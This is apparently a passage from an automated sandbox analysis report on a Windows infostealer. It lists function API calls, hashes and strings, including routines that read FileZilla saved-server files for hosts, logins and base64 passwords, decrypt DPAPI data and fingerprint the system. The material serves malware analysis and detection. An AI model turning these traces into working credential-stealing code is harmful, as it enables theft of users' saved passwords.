                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334442632-0
                                                                                                      • Opcode ID: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
                                                                                                      • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                      • Opcode Fuzzy Hash: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
                                                                                                      • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                      • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                      • String ID: /
                                                                                                      • API String ID: 3090951853-4001269591
                                                                                                      • Opcode ID: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
                                                                                                      • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                      • Opcode Fuzzy Hash: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
                                                                                                      • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 433455689-1173974218
                                                                                                      • Opcode ID: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
                                                                                                      • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                      • Opcode Fuzzy Hash: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
                                                                                                      • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00414E9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1066202413-0
                                                                                                      • Opcode ID: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
                                                                                                      • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                      • Opcode Fuzzy Hash: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
                                                                                                      • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 004144C0
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                      • wsprintfA.USER32 ref: 00414514
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 362916592-0
                                                                                                      • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                      • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                      • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                      • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                      • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2068576380-0
                                                                                                      • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                      • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                      • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                      • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                      • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1206570057-0
                                                                                                      • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                      • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                      • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                      • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                      • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitInfoProcessSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 752954902-0
                                                                                                      • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                      • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                      • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                      • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                        • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                        • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                      • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                      • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                      • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                      • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                      • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                      • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                      • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                      • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                      • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                      • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                      • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                      • memset.MSVCRT ref: 0040EF17
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                      • API String ID: 337689325-555421843
                                                                                                      • Opcode ID: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
                                                                                                      • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                      • Opcode Fuzzy Hash: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
                                                                                                      • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 162 415ed0-415ee4 call 415dc0 165 416103-416162 LoadLibraryA * 5 162->165 166 415eea-4160fe call 415df0 GetProcAddress * 21 162->166 168 416164-416178 GetProcAddress 165->168 169 41617d-416184 165->169 166->165 168->169 171 4161b6-4161bd 169->171 172 416186-4161b1 GetProcAddress * 2 169->172 173 4161d8-4161df 171->173 174 4161bf-4161d3 GetProcAddress 171->174 172->171 175 4161e1-4161f4 GetProcAddress 173->175 176 4161f9-416200 173->176 174->173 175->176 177 416231-416232 176->177 178 416202-41622c GetProcAddress * 2 176->178 178->177
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D58), ref: 00415F11
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D28), ref: 00415F2A
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D70), ref: 00415F42
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96D88), ref: 00415F5A
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96DA0), ref: 00415F73
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBD968), ref: 00415F8B
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE048), ref: 00415FA3
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE348), ref: 00415FBC
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D96DB8), ref: 00415FD4
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF718), ref: 00415FEC
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF748), ref: 00416005
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF628), ref: 0041601D
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE1A8), ref: 00416035
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF598), ref: 0041604E
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF5B0), ref: 00416066
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE0E8), ref: 0041607E
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF688), ref: 00416097
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF730), ref: 004160AF
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE108), ref: 004160C7
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF4C0), ref: 004160E0
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBDFC8), ref: 004160F8
                                                                                                      • LoadLibraryA.KERNEL32(02DBF640,?,004136C0), ref: 0041610A
                                                                                                      • LoadLibraryA.KERNEL32(02DBF6B8,?,004136C0), ref: 0041611B
                                                                                                      • LoadLibraryA.KERNEL32(02DBF6D0,?,004136C0), ref: 0041612D
                                                                                                      • LoadLibraryA.KERNEL32(02DBF460,?,004136C0), ref: 0041613F
                                                                                                      • LoadLibraryA.KERNEL32(02DBF700,?,004136C0), ref: 00416150
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DBF658), ref: 00416172
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBF670), ref: 00416193
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBF5E0), ref: 004161AB
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DBF478), ref: 004161CD
                                                                                                      • GetProcAddress.KERNEL32(75450000,02DBE248), ref: 004161EE
                                                                                                      • GetProcAddress.KERNEL32(76E90000,02DBD978), ref: 0041620F
                                                                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
                                                                                                      Strings
                                                                                                      • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: NtQueryInformationProcess
                                                                                                      • API String ID: 2238633743-2781105232
